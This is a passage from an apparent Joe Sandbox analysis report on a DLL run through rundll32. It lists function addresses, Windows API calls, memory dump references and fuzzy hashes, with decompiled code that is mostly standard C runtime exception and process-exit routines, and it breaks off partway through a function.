                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32 ref: 6E7791C7
                                                      • IsDebuggerPresent.KERNEL32 ref: 6E779293
                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 6E7792B3
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 6E7792BD
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                      • String ID:
                                                      • API String ID: 254469556-0
                                                      • Opcode ID: 93e6cd95ee6650f18c4a8ba2d395c4a55fb6a648b5ba3e004d2cd20647b90e1b
                                                      • Instruction ID: 7ba699ee629c03b7c3fed5cdb20e7d24dac6a3ad1cba6324008873248e6c3c02
                                                      • Opcode Fuzzy Hash: 93e6cd95ee6650f18c4a8ba2d395c4a55fb6a648b5ba3e004d2cd20647b90e1b
                                                      • Instruction Fuzzy Hash: B2312975D0661C9BDF21DFA4DA89BCDBBB8BF19304F1041AAE40DAB250EB715A84CF44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E79A730, Relevance: 5.8, Strings: 4, Instructions: 808COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: But Brou$Log su$aXi$paper Se
                                                      • API String ID: 0-985190163
                                                      • Opcode ID: 95900a1c6d046b967e930b3cc0e6e43daa846e96d8859b0c650d3600202bb246
                                                      • Instruction ID: 08761d46c5a41fcf34d4e90947c3df27c75aa095e6942e58089be53ec8a14d8f
                                                      • Opcode Fuzzy Hash: 95900a1c6d046b967e930b3cc0e6e43daa846e96d8859b0c650d3600202bb246
                                                      • Instruction Fuzzy Hash: 7272DBB1D01656DFCB24CFA8CA447ADBBF5FF4A314F14466AD419AB390E738A900CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7E9302, Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 6E7E93FA
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E7E9404
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 6E7E9411
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: 388f931d6d3b0e354d06063dcbf9073c2b9032e9b06db188db9a938827feadfa
                                                      • Instruction ID: 74803ffc29d5ad5840711a7ee0c4fa16d0a069aa5d692c00514408fd6f912ee3
                                                      • Opcode Fuzzy Hash: 388f931d6d3b0e354d06063dcbf9073c2b9032e9b06db188db9a938827feadfa
                                                      • Instruction Fuzzy Hash: 6D31D37591121D9BCB61DFA4DA887CDBBB8BF08310F5042EAE41CA7260E7709B85CF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77D332, Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E6E77D332(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x6e78c00c; // 0x9bbef7a8
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E6E7792D6(_t41);
					_pop(_t62);
				}
				E6E779DB0(_t67,  &_v804, 0, 0x50);
				E6E779DB0(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E6E7792D6(_t57);
				}
				return E6E778727(_t61, _v8 ^ _t70, _t66, _t68, _t69);
			}





































                                                      0x6e77d332
                                                      0x6e77d332
                                                      0x6e77d332
                                                      0x6e77d33d
                                                      0x6e77d342
                                                      0x6e77d344
                                                      0x6e77d34c
                                                      0x6e77d34e
                                                      0x6e77d351
                                                      0x6e77d356
                                                      0x6e77d356
                                                      0x6e77d362
                                                      0x6e77d375
                                                      0x6e77d383
                                                      0x6e77d389
                                                      0x6e77d38f
                                                      0x6e77d395
                                                      0x6e77d39b
                                                      0x6e77d3a1
                                                      0x6e77d3a7
                                                      0x6e77d3ad
                                                      0x6e77d3b3
                                                      0x6e77d3b9
                                                      0x6e77d3c0
                                                      0x6e77d3c7
                                                      0x6e77d3ce
                                                      0x6e77d3d5
                                                      0x6e77d3dc
                                                      0x6e77d3e3
                                                      0x6e77d3e4
                                                      0x6e77d3ed
                                                      0x6e77d3f3
                                                      0x6e77d3f6
                                                      0x6e77d3fc
                                                      0x6e77d409
                                                      0x6e77d412
                                                      0x6e77d41b
                                                      0x6e77d424
                                                      0x6e77d432
                                                      0x6e77d434
                                                      0x6e77d449
                                                      0x6e77d455
                                                      0x6e77d458
                                                      0x6e77d45d
                                                      0x6e77d46a

                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6E77D42A
                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 6E77D434
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 6E77D441
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: a38c770508fb787418216587778bbb20a71c844e801a2e259ee026f57945b7de
                                                      • Instruction ID: 873fe0b5b6f05424276c69d085e2275c9a0989ea6dfb7db3bb03609e2e07ae9a
                                                      • Opcode Fuzzy Hash: a38c770508fb787418216587778bbb20a71c844e801a2e259ee026f57945b7de
                                                      • Instruction Fuzzy Hash: 1731F475901228ABCF21DF64D988BCDBBB8BF19310F5041EAE80DA6260E7709B85CF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77C61C, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E6E77C61C(int _a4) {
				void* _t14;

				if(E6E77F248(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E6E77C6A1(_t14, _a4);
				ExitProcess(_a4);
			}




                                                      0x6e77c629
                                                      0x6e77c645
                                                      0x6e77c645
                                                      0x6e77c64e
                                                      0x6e77c657

                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(?,?,6E77C61B,?,00000001,?,?), ref: 6E77C63E
                                                      • TerminateProcess.KERNEL32(00000000,?,6E77C61B,?,00000001,?,?), ref: 6E77C645
                                                      • ExitProcess.KERNEL32 ref: 6E77C657
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 1d80a4ea77ed3f025bf12acff55acc98c7ff7a013c5d40df5aa3625540327b39
                                                      • Instruction ID: 9efaa7d2f98c84ad236879c88364fc650f3ac99a5ebbeab0a7160a71d730e237
                                                      • Opcode Fuzzy Hash: 1d80a4ea77ed3f025bf12acff55acc98c7ff7a013c5d40df5aa3625540327b39
                                                      • Instruction Fuzzy Hash: C0E0BF71014904AFCF116FA4EA9CA5D3F6DFB5A246B604534F816CA134CB35DA52CA90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7F4D21, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(6E849A90,?,6E7F4CF7,6E849A90,6E8472B0,0000000C,6E7F4E3C,6E849A90,00000002,00000000,?,6E7EB3EB,00000003,?,6E7BD4AF,6E7BD520), ref: 6E7F4D42
                                                      • TerminateProcess.KERNEL32(00000000,?,6E7F4CF7,6E849A90,6E8472B0,0000000C,6E7F4E3C,6E849A90,00000002,00000000,?,6E7EB3EB,00000003,?,6E7BD4AF,6E7BD520), ref: 6E7F4D49
                                                      • ExitProcess.KERNEL32 ref: 6E7F4D5B
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: c903db01b26731396f2ddae4d2d21739299d2cb0d99679e4c7f56aec218fca25
                                                      • Instruction ID: e4a81ad6b9bf37559947e722694cb3d7517b97b70367d02f3ec1e8ea68f6852a
                                                      • Opcode Fuzzy Hash: c903db01b26731396f2ddae4d2d21739299d2cb0d99679e4c7f56aec218fca25
                                                      • Instruction Fuzzy Hash: 0BE0B632014609EFCF416FE4CA09A9C3B6AEF45645F004568FA099B631EB35E983DE81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E802EC8, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .
                                                      • API String ID: 0-248832578
                                                      • Opcode ID: 8192f4e0e81d00208464bdff241664311c4b5b4d2eb349cdf2e9ae2b2fcb2a5d
                                                      • Instruction ID: 3d5f836731dc2862b758a95e64eace5fbb711681e9912e3c48f03ff4238eb62a
                                                      • Opcode Fuzzy Hash: 8192f4e0e81d00208464bdff241664311c4b5b4d2eb349cdf2e9ae2b2fcb2a5d
                                                      • Instruction Fuzzy Hash: DB413A72904209AFCB148EF8CC88EEB7B7DEF42354F104A99F919C7295E6719E018750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7A9E50, Relevance: 1.9, APIs: 1, Instructions: 388COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Tolower.LIBCPMT ref: 6E7A9FE5
                                                        • Part of subcall function 6E7BD907: std::regex_error::regex_error.LIBCPMT ref: 6E7BD913
                                                        • Part of subcall function 6E7BD907: __CxxThrowException@8.LIBVCRUNTIME ref: 6E7BD921
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Exception@8ThrowTolowerstd::regex_error::regex_error
                                                      • String ID:
                                                      • API String ID: 2991004702-0
                                                      • Opcode ID: 26d0609aa94b819b230aee3fcb57b4eb3b04c9fa6a1a49979f719f6d6dcfb7c9
                                                      • Instruction ID: 5428b26bb397df0754e37fd20a5c3588322700121b8ba5d59ab08403991aedd2
                                                      • Opcode Fuzzy Hash: 26d0609aa94b819b230aee3fcb57b4eb3b04c9fa6a1a49979f719f6d6dcfb7c9
                                                      • Instruction Fuzzy Hash: 5AE1C271604607DFCB44CF9CD690AAABBB2FF85304F148668E6119B7A5D732E861CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E783C31, Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODECrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E6E783C31(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E6E783660(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E6E7835CC(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}
























                                                      0x6e783c3f
                                                      0x6e783c46
                                                      0x6e783c4b
                                                      0x6e783c51
                                                      0x6e783c54
                                                      0x6e783c5a
                                                      0x6e783c5f
                                                      0x6e783c64
                                                      0x6e783c64
                                                      0x6e783c6a
                                                      0x6e783c6f
                                                      0x6e783c74
                                                      0x6e783c74
                                                      0x6e783c7b
                                                      0x6e783c80
                                                      0x6e783c85
                                                      0x6e783c85
                                                      0x6e783c8c
                                                      0x6e783c91
                                                      0x6e783c96
                                                      0x6e783c96
                                                      0x6e783c9d
                                                      0x6e783ca2
                                                      0x6e783ca7
                                                      0x6e783ca7
                                                      0x6e783caf
                                                      0x6e783cbf
                                                      0x6e783cd1
                                                      0x6e783ce3
                                                      0x6e783cf6
                                                      0x6e783d08
                                                      0x6e783d10
                                                      0x6e783d15
                                                      0x6e783d1a
                                                      0x6e783d1a
                                                      0x6e783d21
                                                      0x6e783d26
                                                      0x6e783d26
                                                      0x6e783d2d
                                                      0x6e783d32
                                                      0x6e783d32
                                                      0x6e783d39
                                                      0x6e783d3e
                                                      0x6e783d3e
                                                      0x6e783d45
                                                      0x6e783d4a
                                                      0x6e783d4a
                                                      0x6e783d54
                                                      0x6e783d56
                                                      0x6e783d90
                                                      0x6e783d58
                                                      0x6e783d5d
                                                      0x6e783d81
                                                      0x6e783d89
                                                      0x6e783d7d
                                                      0x6e783d7d
                                                      0x6e783d93
                                                      0x6e783d9a
                                                      0x6e783d9c
                                                      0x6e783dbe
                                                      0x6e783dc6
                                                      0x6e783dc9
                                                      0x6e783dc9
                                                      0x6e783dcb
                                                      0x6e783dcb
                                                      0x6e783dd6
                                                      0x6e783ddc
                                                      0x6e783de1
                                                      0x6e783de8
                                                      0x6e783e22
                                                      0x6e783e2d
                                                      0x6e783e33
                                                      0x6e783e36
                                                      0x6e783e39
                                                      0x6e783e45
                                                      0x6e783e4d
                                                      0x6e783dea
                                                      0x6e783ded
                                                      0x6e783df9
                                                      0x6e783dff
                                                      0x6e783e05
                                                      0x6e783e08
                                                      0x6e783e11
                                                      0x6e783e11
                                                      0x6e783e50
                                                      0x6e783e5e
                                                      0x6e783e64
                                                      0x6e783e67
                                                      0x6e783e6c
                                                      0x6e783e6e
                                                      0x6e783e71
                                                      0x6e783e71
                                                      0x6e783e76
                                                      0x6e783e78
                                                      0x6e783e7b
                                                      0x6e783e7b
                                                      0x6e783e80
                                                      0x6e783e82
                                                      0x6e783e85
                                                      0x6e783e85
                                                      0x6e783e8a
                                                      0x6e783e8c
                                                      0x6e783e8f
                                                      0x6e783e8f
                                                      0x6e783e94
                                                      0x6e783e96
                                                      0x6e783e96
                                                      0x6e783ea3
                                                      0x6e783ea6
                                                      0x6e783edd
                                                      0x6e783ea8
                                                      0x6e783ea8
                                                      0x6e783eab
                                                      0x6e783ed6
                                                      0x6e783ecb
                                                      0x6e783ecb
                                                      0x6e783edf
                                                      0x6e783ee7
                                                      0x6e783eea
                                                      0x6e783f09
                                                      0x6e783f0e
                                                      0x6e783f0e
                                                      0x6e783f10
                                                      0x6e783f15
                                                      0x6e783f21
                                                      0x6e783f17
                                                      0x6e783f1a
                                                      0x6e783f1a
                                                      0x6e783f26
                                                      0x6e783f26
                                                      0x6e783eec
                                                      0x6e783eef
                                                      0x6e783efe
                                                      0x00000000
                                                      0x6e783efe
                                                      0x6e783ef1
                                                      0x6e783ef4
                                                      0x6e783ef6
                                                      0x6e783ef6
                                                      0x00000000
                                                      0x6e783ef4
                                                      0x6e783ead
                                                      0x6e783eb0
                                                      0x6e783ec6
                                                      0x00000000
                                                      0x6e783ec6
                                                      0x6e783eb5
                                                      0x6e783eb7
                                                      0x6e783eb7
                                                      0x6e783eb5
                                                      0x00000000
                                                      0x6e783ea6
                                                      0x6e783da3
                                                      0x6e783db1
                                                      0x6e783db9
                                                      0x00000000
                                                      0x6e783db9
                                                      0x6e783da7
                                                      0x6e783dac
                                                      0x6e783dac
                                                      0x00000000
                                                      0x6e783da7
                                                      0x6e783d64
                                                      0x6e783d72
                                                      0x6e783d7a
                                                      0x00000000
                                                      0x6e783d7a
                                                      0x6e783d68
                                                      0x6e783d6d
                                                      0x6e783d6d
                                                      0x6e783d68

                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E783C2C,?,?,00000008,?,?,6E7838C4,00000000), ref: 6E783E5E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      • Opcode ID: cc72e7881776b1c94eec325504d0ea7aa8e8b8c219ba2a2231de8c7d7d93bd35
                                                      • Instruction ID: 61b3a74db004577a0edeef2cdd27921871a3d960e676584a4d5477a06af4b54b
                                                      • Opcode Fuzzy Hash: cc72e7881776b1c94eec325504d0ea7aa8e8b8c219ba2a2231de8c7d7d93bd35
                                                      • Instruction Fuzzy Hash: C5B1483121060AEFD745CF6CC59AB567BA0FF55364F258668E8A9CF2A1C335E982CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7FB360, Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?), ref: 6E7FB58D
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      • Opcode ID: 3107fe2730bd22d68bb2a4a54edc1ba3598f7b81f3c33e2bc485cbbd080899a2
                                                      • Instruction ID: 6545c49e828ff626f9729dc0ba821de213a87f27875b5e9fa037cfaced2d588e
                                                      • Opcode Fuzzy Hash: 3107fe2730bd22d68bb2a4a54edc1ba3598f7b81f3c33e2bc485cbbd080899a2
                                                      • Instruction Fuzzy Hash: B7B13731210609CFDB45CF68C696B657BA0FF45365F258668E8A9CF3A9C335E982CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7792E1, Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 88%
                                                      			E6E7792E1(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x6e78ccb0 =  *0x6e78ccb0 & 0x00000000;
				 *0x6e78c010 =  *0x6e78c010 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
